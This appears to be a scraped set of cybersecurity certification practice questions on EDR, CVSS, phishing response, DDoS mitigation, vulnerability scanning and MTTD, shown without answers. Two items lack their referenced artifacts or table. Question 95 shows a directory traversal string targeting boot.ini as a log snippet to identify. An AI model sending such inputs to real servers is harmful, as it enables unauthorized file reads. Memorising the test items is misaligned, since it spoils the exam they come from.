An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

Options:

A.  

DLP

B.  

NAC

C.  

EDR

D.  

NIDS

Discussion 0
Questions 85

A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following would most likely be required by the infrastructure team so that vulnerabilities can be remediated quickly? (Select two).

Options:

A.  

Hostname

B.  

Missing KPI

C.  

CVE details

D.  

POC availability

E.  

loCs

F.  

npm identifier

Discussion 0
Questions 86

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Options:

A.  

Scope

B.  

Weaponization

C.  

CVSS

D.  

Asset value

Discussion 0
Questions 87

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

Options:

A.  

TO ensure the report is legally acceptable in case it needs to be presented in court

B.  

To present a lessons-learned analysis for the incident response team

C.  

To ensure the evidence can be used in a postmortem analysis

D.  

To prevent the possible loss of a data source for further root cause analysis

Discussion 0
Questions 88

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

Options:

A.  

Scan the employee's computer with virus and malware tools.

B.  

Review the actions taken by the employee and the email related to the event

C.  

Contact human resources and recommend the termination of the employee.

D.  

Assign security awareness training to the employee involved in the incident.

Discussion 0
Questions 89

Which of the following is a commonly used four-component framework to communicate threat actor behavior?

Options:

A.  

STRIDE

B.  

Diamond Model of Intrusion Analysis

C.  

Cyber Kill Chain

D.  

MITRE ATT&CK

Discussion 0
Questions 90

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?

Options:

A.  

Block the attacks using firewall rules.

B.  

Deploy an IPS in the perimeter network.

C.  

Roll out a CDN.

D.  

Implement a load balancer.

Discussion 0
Questions 91

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to

reduce risks associated with the application development?

Options:

A.  

Perform static analyses using an integrated development environment.

B.  

Deploy compensating controls into the environment.

C.  

Implement server-side logging and automatic updates.

D.  

Conduct regular code reviews using OWASP best practices.

Discussion 0
Questions 92

The security analyst received the monthly vulnerability report. The following findings were included in the report

• Five of the systems only required a reboot to finalize the patch application.

• Two of the servers are running outdated operating systems and cannot be patched

The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

Options:

A.  

Compensating controls

B.  

Due diligence

C.  

Maintenance windows

D.  

Passive discovery

Discussion 0
Questions 93

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.  

SIEM ingestion logs are reduced by 20%.

B.  

Phishing alerts drop by 20%.

C.  

False positive rates drop to 20%.

D.  

The MTTR decreases by 20%.

Discussion 0
Questions 94

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

Options:

A.  

Implementing multifactor authentication on the server OS

B.  

Hashing user passwords on the web application

C.  

Performing input validation before allowing submission

D.  

Segmenting the network between the users and the web server

Discussion 0
Questions 95

While reviewing the web server logs a security analyst notices the following snippet

..\../..\../boot.ini

Which of the following is being attempted?

Options:

A.  

Directory traversal

B.  

Remote file inclusion

C.  

Cross-site scripting

D.  

Remote code execution

E.  

Enumeration of/etc/pasawd

Discussion 0
Questions 96

A security analyst has prepared a vulnerability scan that contains all of the company's functional subnets. During the initial scan, users reported that network printers began to print pages that contained unreadable text and icons.

Which of the following should the analyst do to ensure this behavior does not oocur during subsequent vulnerability scans?

Options:

A.  

Perform non-credentialed scans.

B.  

Ignore embedded web server ports.

C.  

Create a tailored scan for the printer subnet.

D.  

Increase the threshold length of the scan timeout.

Discussion 0
Questions 97

A company recently experienced a security incident. The security team has determined

a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.

Part 2

Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each

control may only be used once, and not all controls will be used.

Firewall log:

File integrity Monitoring Report:

Malware domain list:

Vulnerability Scan Report:

Phishing Email:

Options:

Discussion 0
Questions 98

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

Options:

A.  

function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B.  

function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C.  

function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D.  

function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

Discussion 0
Questions 99

An organization has tracked several incidents that are listed in the following table:

Which of the following is the organization's MTTD?

Options:

A.  

140

B.  

150

C.  

160

D.  

180

Discussion 0